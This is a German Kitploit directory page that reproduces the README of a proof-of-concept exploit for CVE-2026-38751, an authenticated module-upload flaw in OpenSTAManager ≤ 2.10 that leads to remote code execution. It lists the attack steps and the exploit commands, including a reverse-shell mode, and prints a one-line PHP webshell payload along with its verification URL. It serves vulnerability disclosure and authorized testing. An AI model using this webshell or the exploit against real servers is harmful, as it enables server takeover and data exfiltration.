Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC — Dieses Repository enthält einen Proof-of-Concept-Exploit (PoC) für CVE-2026-38751, der OpenSTAManager ≤ 2.10 betrifft. Die Schwachstelle ermöglicht es einem authentifizierten Angreifer, über die Modul-Update-Funktionalität ein bösartiges Modul hochzuladen, was zu beliebigem Datei-Upload und Remote-Code-Ausführung (RCE) führt. | Kitploit
Tools/GitHubGitHub/mkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubmkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc

CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC

Repository anzeigen
1vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Dieses Repository enthält einen Proof-of-Concept-Exploit (PoC) für CVE-2026-38751, der OpenSTAManager ≤ 2.10 betrifft. Die Schwachstelle ermöglicht es einem authentifizierten Angreifer, über die Modul-Update-Funktionalität ein bösartiges Modul hochzuladen, was zu beliebigem Datei-Upload und Remote-Code-Ausführung (RCE) führt.

Teilen

CVE-2026-38751 – OpenSTAManager Beliebiger Datei-Upload (PoC)

Dieses Repository enthält einen Proof-of-Concept-Exploit (PoC) für CVE-2026-38751, der OpenSTAManager ≤ 2.10 betrifft. Die Schwachstelle ermöglicht es einem authentifizierten Angreifer, über die Modul-Update-Funktionalität ein bösartiges Modul hochzuladen, was zu beliebigem Datei-Upload und Remote-Code-Ausführung (RCE) führt.

CVE-Referenz

  • MITRE-CVE-Eintrag (erster Offenlegungseintrag): https://www.cve.org/CVERecord?id=CVE-2026-38751
  • NVD (NIST) Schwachstellendatenbank: https://nvd.nist.gov/vuln/detail/CVE-2026-38751
  • GitHub Advisory Database https://github.com/advisories/GHSA-rm34-fg4m-39mw

Betroffene Software

  • OpenSTAManager ≤ 2.10
  • Modul-Update-System (modules/aggiornamenti/upload_modules.php)

Beschreibung der Schwachstelle

Die Modul-Update-Funktionalität erlaubt authentifizierten Benutzern das Hochladen ZIP-basierter Module ohne ordnungsgemäße Validierung der Dateiinhalte oder Ausführungsbeschränkungen. Ein Angreifer kann ein bösartiges Modul mit PHP-Payloads erstellen, die anschließend im Web-Root abgelegt und über den Anwendungskontext ausgeführt werden. Dies führt zu:

  • Beliebiger Datei-Upload (CWE-434)
  • Remote-Code-Ausführung über hochgeladene PHP-Dateien
  • Vollständiger Kompromittierung des Anwendungskontexts

Angriffsablauf (Überblick)

  1. Bei OpenSTAManager authentifizieren
  2. Präpariertes Modul-ZIP-Archiv hochladen
  3. Modul-Installations-/Update-Prozess auslösen
  4. Hochgeladenen PHP-Payload über das Web-Root aufrufen
  5. Beliebige Befehle auf dem Server ausführen

##Auswirkungen Eine erfolgreiche Ausnutzung ermöglicht:

  • Remote-Befehlsausführung
  • Kompromittierung des Webservers
  • Datenexfiltration
  • Vollständige Übernahme der Anwendung, abhängig von den Berechtigungen

Anforderungen

  • Gültiges authentifiziertes Benutzerkonto
  • Zugriff auf die aktivierte Modul-Update-Funktionalität

Verwendung (PoC)

  1. Bösartiges Modul erzeugen
root@kitploit:~
python exploit.py --build

Erzeugt:

root@kitploit:~
update.zip
└── run/
    ├── MODULE
    └── evil.php
  1. Exploit ausführen
root@kitploit:~
python exploit.py <username> <password> <target_url>

Optionaler Reverse-Shell-Modus:

root@kitploit:~
python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>

Beispiel-Payload

root@kitploit:~
<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>

Verifizierung

Bei Erfolg führt der folgende Endpunkt Systembefehle aus: /modules/run/evil.php?cmd=id

MITRE / NVD-Referenzen

  • MITRE-CVE-Datensatz: https://www.cve.org/CVERecord?id=CVE-2026-38751
  • NVD-Eintrag: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

Haftungsausschluss

Dieses Projekt ist für folgende Zwecke gedacht:

  • Bildungszwecke
  • Autorisierte Sicherheitstests
  • Forschungsumgebungen

Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.

Hinweise

Die Erkennung kann je nach Serverkonfiguration variieren. Einige Installationen deaktivieren möglicherweise die direkte PHP-Ausführung in Modulverzeichnissen. Das Timing der Modulaktivierung kann Wiederholungsversuche erfordern.

Danksagungen

  • MITRE-CVE-Programm
  • NIST National Vulnerability Database (NVD)
  • Betreuer des OpenSTAManager-Projekts
  • https://github.com/fuutianyii/poc (Erster PoC)
Tool herunterladen